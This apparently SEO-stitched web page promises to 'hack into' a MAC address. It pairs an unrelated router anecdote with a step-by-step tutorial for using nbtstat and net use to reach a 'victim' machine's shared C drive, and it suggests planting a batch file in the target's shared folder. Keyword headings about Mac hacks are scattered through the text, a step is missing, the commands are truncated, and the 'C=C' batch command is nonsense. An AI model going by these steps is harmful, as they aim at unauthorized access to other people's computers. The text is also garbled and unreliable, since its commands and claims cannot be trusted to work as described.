Hack Into Mac Address

Sep 03, 2012  Everything seemed to be fine, except one thing, there was me and another guy in the network. I first thought of simply blocking the MAC address but I couldn't hence I could only input 16 characters, which left me with a character left unput (MAC address should be: '00-00-00-00-00-00').

BookHack Into Mac Address
Note: Read my latest tutorial that will work 100% than this article :
Hacking computer with just IP address

In my Last Post I guide you to get the IP address of Your victim. Now i am going to guide you how to access the victim system remotely using the IP address.


Steps to Follow:

Step 1:
Now Go to Star and click Run and then type as “CMD” and hit enter.
command prompt will open.

Step 2:
Type in cmd as “nbtstat -a IPaddressOfVictim” and hit enter.

For eg:

nbstat -a

If you see this your in NetBIOS Remote Machine Name Table

Mac Os Hacks

Name Type Status —————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx

If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.

Step 4:
Now type as “net use x: IPaddressOfVictimCDISK” and hit enter>

replace with ip address of vitim in the place of “IPaddressOfVictim.
You can give any letter instead of ‘x’.

For eg:
net use x:

Hack Into Mac Address Book

Step 5:
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive

Hack Mac Password With Usb

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.

This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to “hack” is not on your network.
If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.